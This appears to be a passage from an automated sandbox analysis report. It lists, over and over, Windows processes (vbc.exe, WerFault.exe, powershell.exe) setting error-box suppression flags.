Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
